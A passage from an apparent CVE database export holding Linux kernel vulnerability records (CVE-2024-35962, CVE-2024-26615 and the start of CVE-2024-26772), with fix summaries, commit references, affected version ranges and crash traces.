C4] lr : expire_timers+0x2a4/0x438\n[ 9436.262168][ C4] sp : ffffffc010023dd0\n[ 9436.262171][ C4] x29: ffffffc010023df0 x28: ffffffd0636fdc18\n[ 9436.262178][ C4] x27: ffffffd063569dd0 x26: ffffffd063536008\n[ 9436.262182][ C4] x25: 0000000000000001 x24: ffffff88f7c69280\n[ 9436.262185][ C4] x23: 00000000000000e0 x22: dead000000000122\n[ 9436.262188][ C4] x21: 000000010022da29 x20: ffffff8af72b4e80\n[ 9436.262191][ C4] x19: ffffffc010023e50 x18: ffffffc010025038\n[ 9436.262195][ C4] x17: 0000000000000240 x16: 0000000000000201\n[ 9436.262199][ C4] x15: ffffffffffffffff x14: ffffff889f3c3100\n[ 9436.262203][ C4] x13: ffffff889f3c3100 x12: 00000000049f56b8\n[ 9436.262207][ C4] x11: 00000000049f56b8 x10: 00000000ffffffff\n[ 9436.262212][ C4] x9 : ffffffc010023e50 x8 : dead000000000122\n[ 9436.262216][ C4] x7 : ffffffffffffffff x6 : ffffffc0100239d8\n[ 9436.262220][ C4] x5 : 0000000000000000 x4 : 0000000000000101\n[ 9436.262223][ C4] x3 : 0000000000000080 x2 : ffffff8\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:26.466Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3399cc7013e761fee9d6eec795e9b31ab0cbe475"
},
{
"url": "https://git.kernel.org/stable/c/099f6a9edbe30b142c1d97fe9a4748601d995675"
},
{
"url": "https://git.kernel.org/stable/c/31569995fc65007b73a3fff605ec2b3401b435e9"
},
{
"url": "https://git.kernel.org/stable/c/0aedb319ef3ed39e9e5a7b7726c8264ca627bbd9"
},
{
"url": "https://git.kernel.org/stable/c/ae815e2fdc284ab31651d52460698bd89c0fce22"
},
{
"url": "https://git.kernel.org/stable/c/aed5ed595960c6d301dcd4ed31aeaa7a8054c0c6"
}
],
"title": "PM / devfreq: Synchronize devfreq_monitor_[start/stop]",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52635",
"datePublished": "2024-04-02T06:49:13.143Z",
"dateReserved": "2024-03-06T09:52:12.092Z",
"dateUpdated": "2025-05-04T07:40:26.466Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35962 (GCVE-0-2024-35962)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: complete validation of user input
In my recent commit, I missed that do_replace() handlers
use copy_from_sockptr() (which I fixed), followed
by unsafe copy_from_sockptr_offset() calls.
In all functions, we can perform the @optlen validation
before even calling xt_alloc_table_info() with the following
check:
if ((u64)optlen < (u64)tmp.size + sizeof(tmp))
return -EINVAL;
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0f038242b77ddfc505bf4163d4904c1abd2e74d6 Version: 440e948cf0eff32cfe322dcbca3f2525354b159b Version: 18aae2cb87e5faa9c5bd865260ceadac60d5a6c5 Version: 81d51b9b7c95e791ba3c1a2dd77920a9d3b3f525 Version: 58f2bfb789e6bd3bc24a2c9c1580f3c67aec3018 Version: 0c83842df40f86e529db6842231154772c20edcc |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.038Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf4bc359b76144a3dd55d7c09464ef4c5f2b2b05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97dab36e57c64106e1c8ebd66cbf0d2d1e52d6b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c760089aa98289b4b88a7ff5a62dd92845adf223"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89242d9584c342cb83311b598d9e6b82572eadf8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/562b7245131f6e9f1d280c8b5a8750f03edfc05c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65acf6e0501ac8880a4f73980d01b5d27648b956"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35962",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:40:32.586631Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:14.037Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/netfilter/arp_tables.c",
"net/ipv4/netfilter/ip_tables.c",
"net/ipv6/netfilter/ip6_tables.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cf4bc359b76144a3dd55d7c09464ef4c5f2b2b05",
"status": "affected",
"version": "0f038242b77ddfc505bf4163d4904c1abd2e74d6",
"versionType": "git"
},
{
"lessThan": "97dab36e57c64106e1c8ebd66cbf0d2d1e52d6b7",
"status": "affected",
"version": "440e948cf0eff32cfe322dcbca3f2525354b159b",
"versionType": "git"
},
{
"lessThan": "c760089aa98289b4b88a7ff5a62dd92845adf223",
"status": "affected",
"version": "18aae2cb87e5faa9c5bd865260ceadac60d5a6c5",
"versionType": "git"
},
{
"lessThan": "89242d9584c342cb83311b598d9e6b82572eadf8",
"status": "affected",
"version": "81d51b9b7c95e791ba3c1a2dd77920a9d3b3f525",
"versionType": "git"
},
{
"lessThan": "562b7245131f6e9f1d280c8b5a8750f03edfc05c",
"status": "affected",
"version": "58f2bfb789e6bd3bc24a2c9c1580f3c67aec3018",
"versionType": "git"
},
{
"lessThan": "65acf6e0501ac8880a4f73980d01b5d27648b956",
"status": "affected",
"version": "0c83842df40f86e529db6842231154772c20edcc",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/netfilter/arp_tables.c",
"net/ipv4/netfilter/ip_tables.c",
"net/ipv6/netfilter/ip6_tables.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.10.216",
"status": "affected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThan": "5.15.156",
"status": "affected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThan": "6.1.87",
"status": "affected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThan": "6.6.28",
"status": "affected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThan": "6.8.7",
"status": "affected",
"version": "6.8.5",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "6.1.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "6.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "6.8.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: complete validation of user input\n\nIn my recent commit, I missed that do_replace() handlers\nuse copy_from_sockptr() (which I fixed), followed\nby unsafe copy_from_sockptr_offset() calls.\n\nIn all functions, we can perform the @optlen validation\nbefore even calling xt_alloc_table_info() with the following\ncheck:\n\nif ((u64)optlen \u003c (u64)tmp.size + sizeof(tmp))\n return -EINVAL;"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:19.304Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cf4bc359b76144a3dd55d7c09464ef4c5f2b2b05"
},
{
"url": "https://git.kernel.org/stable/c/97dab36e57c64106e1c8ebd66cbf0d2d1e52d6b7"
},
{
"url": "https://git.kernel.org/stable/c/c760089aa98289b4b88a7ff5a62dd92845adf223"
},
{
"url": "https://git.kernel.org/stable/c/89242d9584c342cb83311b598d9e6b82572eadf8"
},
{
"url": "https://git.kernel.org/stable/c/562b7245131f6e9f1d280c8b5a8750f03edfc05c"
},
{
"url": "https://git.kernel.org/stable/c/65acf6e0501ac8880a4f73980d01b5d27648b956"
}
],
"title": "netfilter: complete validation of user input",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35962",
"datePublished": "2024-05-20T09:41:53.207Z",
"dateReserved": "2024-05-17T13:50:33.137Z",
"dateUpdated": "2025-05-04T09:09:19.304Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26615 (GCVE-0-2024-26615)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix illegal rmb_desc access in SMC-D connection dump
A crash was found when dumping SMC-D connections. It can be reproduced
by following steps:
- run nginx/wrk test:
smc_run nginx
smc_run wrk -t 16 -c 1000 -d <duration> -H 'Connection: Close' <URL>
- continuously dump SMC-D connections in parallel:
watch -n 1 'smcss -D'
BUG: kernel NULL pointer dereference, address: 0000000000000030
CPU: 2 PID: 7204 Comm: smcss Kdump: loaded Tainted: G E 6.7.0+ #55
RIP: 0010:__smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag]
Call Trace:
<TASK>
? __die+0x24/0x70
? page_fault_oops+0x66/0x150
? exc_page_fault+0x69/0x140
? asm_exc_page_fault+0x26/0x30
? __smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag]
? __kmalloc_node_track_caller+0x35d/0x430
? __alloc_skb+0x77/0x170
smc_diag_dump_proto+0xd0/0xf0 [smc_diag]
smc_diag_dump+0x26/0x60 [smc_diag]
netlink_dump+0x19f/0x320
__netlink_dump_start+0x1dc/0x300
smc_diag_handler_dump+0x6a/0x80 [smc_diag]
? __pfx_smc_diag_dump+0x10/0x10 [smc_diag]
sock_diag_rcv_msg+0x121/0x140
? __pfx_sock_diag_rcv_msg+0x10/0x10
netlink_rcv_skb+0x5a/0x110
sock_diag_rcv+0x28/0x40
netlink_unicast+0x22a/0x330
netlink_sendmsg+0x1f8/0x420
__sock_sendmsg+0xb0/0xc0
____sys_sendmsg+0x24e/0x300
? copy_msghdr_from_user+0x62/0x80
___sys_sendmsg+0x7c/0xd0
? __do_fault+0x34/0x160
? do_read_fault+0x5f/0x100
? do_fault+0xb0/0x110
? __handle_mm_fault+0x2b0/0x6c0
__sys_sendmsg+0x4d/0x80
do_syscall_64+0x69/0x180
entry_SYSCALL_64_after_hwframe+0x6e/0x76
It is possible that the connection is in process of being established
when we dump it. Assumed that the connection has been registered in a
link group by smc_conn_create() but the rmb_desc has not yet been
initialized by smc_buf_create(), thus causing the illegal access to
conn->rmb_desc. So fix it by checking before dump.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d Version: 4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.717Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26615",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:57:17.586367Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:50.241Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/smc/smc_diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "27aea64838914c6122db5b8bd4bed865c9736f22",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "1fea9969b81c67d0cb1611d1b8b7d19049d937be",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "68b888d51ac82f2b96bf5e077a31d76afcdef25a",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "6994dba06321e3c48fdad0ba796a063d9d82183a",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "a164c2922675d7051805cdaf2b07daffe44f20d9",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "8f3f9186e5bb96a9c9654c41653210e3ea7e48a6",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
},
{
"lessThan": "dbc153fd3c142909e564bb256da087e13fbf239c",
"status": "affected",
"version": "4b1b7d3b30a6d32ac1a1dcede284e76ef8a8542d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/smc/smc_diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: fix illegal rmb_desc access in SMC-D connection dump\n\nA crash was found when dumping SMC-D connections. It can be reproduced\nby following steps:\n\n- run nginx/wrk test:\n smc_run nginx\n smc_run wrk -t 16 -c 1000 -d \u003cduration\u003e -H \u0027Connection: Close\u0027 \u003cURL\u003e\n\n- continuously dump SMC-D connections in parallel:\n watch -n 1 \u0027smcss -D\u0027\n\n BUG: kernel NULL pointer dereference, address: 0000000000000030\n CPU: 2 PID: 7204 Comm: smcss Kdump: loaded Tainted: G\tE 6.7.0+ #55\n RIP: 0010:__smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag]\n Call Trace:\n \u003cTASK\u003e\n ? __die+0x24/0x70\n ? page_fault_oops+0x66/0x150\n ? exc_page_fault+0x69/0x140\n ? asm_exc_page_fault+0x26/0x30\n ? __smc_diag_dump.constprop.0+0x5e5/0x620 [smc_diag]\n ? __kmalloc_node_track_caller+0x35d/0x430\n ? __alloc_skb+0x77/0x170\n smc_diag_dump_proto+0xd0/0xf0 [smc_diag]\n smc_diag_dump+0x26/0x60 [smc_diag]\n netlink_dump+0x19f/0x320\n __netlink_dump_start+0x1dc/0x300\n smc_diag_handler_dump+0x6a/0x80 [smc_diag]\n ? __pfx_smc_diag_dump+0x10/0x10 [smc_diag]\n sock_diag_rcv_msg+0x121/0x140\n ? __pfx_sock_diag_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x5a/0x110\n sock_diag_rcv+0x28/0x40\n netlink_unicast+0x22a/0x330\n netlink_sendmsg+0x1f8/0x420\n __sock_sendmsg+0xb0/0xc0\n ____sys_sendmsg+0x24e/0x300\n ? copy_msghdr_from_user+0x62/0x80\n ___sys_sendmsg+0x7c/0xd0\n ? __do_fault+0x34/0x160\n ? do_read_fault+0x5f/0x100\n ? do_fault+0xb0/0x110\n ? __handle_mm_fault+0x2b0/0x6c0\n __sys_sendmsg+0x4d/0x80\n do_syscall_64+0x69/0x180\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nIt is possible that the connection is in process of being established\nwhen we dump it. Assumed that the connection has been registered in a\nlink group by smc_conn_create() but the rmb_desc has not yet been\ninitialized by smc_buf_create(), thus causing the illegal access to\nconn-\u003ermb_desc. So fix it by checking before dump."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:21.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/27aea64838914c6122db5b8bd4bed865c9736f22"
},
{
"url": "https://git.kernel.org/stable/c/1fea9969b81c67d0cb1611d1b8b7d19049d937be"
},
{
"url": "https://git.kernel.org/stable/c/5fed92ca32eafbfae8b6bee8ca34cca71c6a8b6d"
},
{
"url": "https://git.kernel.org/stable/c/68b888d51ac82f2b96bf5e077a31d76afcdef25a"
},
{
"url": "https://git.kernel.org/stable/c/6994dba06321e3c48fdad0ba796a063d9d82183a"
},
{
"url": "https://git.kernel.org/stable/c/a164c2922675d7051805cdaf2b07daffe44f20d9"
},
{
"url": "https://git.kernel.org/stable/c/8f3f9186e5bb96a9c9654c41653210e3ea7e48a6"
},
{
"url": "https://git.kernel.org/stable/c/dbc153fd3c142909e564bb256da087e13fbf239c"
}
],
"title": "net/smc: fix illegal rmb_desc access in SMC-D connection dump",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26615",
"datePublished": "2024-02-29T15:52:18.843Z",
"dateReserved": "2024-02-19T14:20:24.131Z",
"dateUpdated": "2025-05-04T08:52:21.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26772 (GCVE-0-2024-26772)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid allocating blocks from corrupted group in ext4_mb_find_by_goal()
Places the logic for checking if the group's block bitmap is corrupt under
the protection of the group lock to avoid allocating blocks from the group
with a corrupted block bitmap.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26772",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T19:16:02.816411Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-01T15:30:43.236Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.428Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a6dcc4ad0f7f7fa8e8d127b5526e7c5f2d38a43"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b92b1bc16d691c95b152c6dbf027ad64315668d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffeb72a80a82aba59a6774b0611f792e0ed3b0b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8de8305a25bfda607fc13475ebe84b978c96d7ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d639102f4cbd4cb65d1225dba3b9265596aab586"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3bbe77a76bc52e9d4d0a120f1509be36e25c916"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21dbe20589c7f48e9c5d336ce6402bcebfa6d76a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/832698373a25950942c04a512daa652c18a9b513"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5a6dcc4ad0f7f7fa8e8d127b5526e7c5f2d38a43",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6b92b1bc16d691c95b152c6dbf027ad64315668d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ffeb72a80a82aba59a6774b0611f792e0ed3b0b7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8de8305a25bfda607fc13475ebe84b978c96d7ff",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d639102f4cbd4cb65d1225dba3b9265596aab586",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d3bbe77a76bc52e9d4d0a120f1509be36e25c916",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "21dbe20589c7f48e9c5d336ce6402bcebfa6d76a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "832698373a25950942c04a512daa652c18a9b513",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
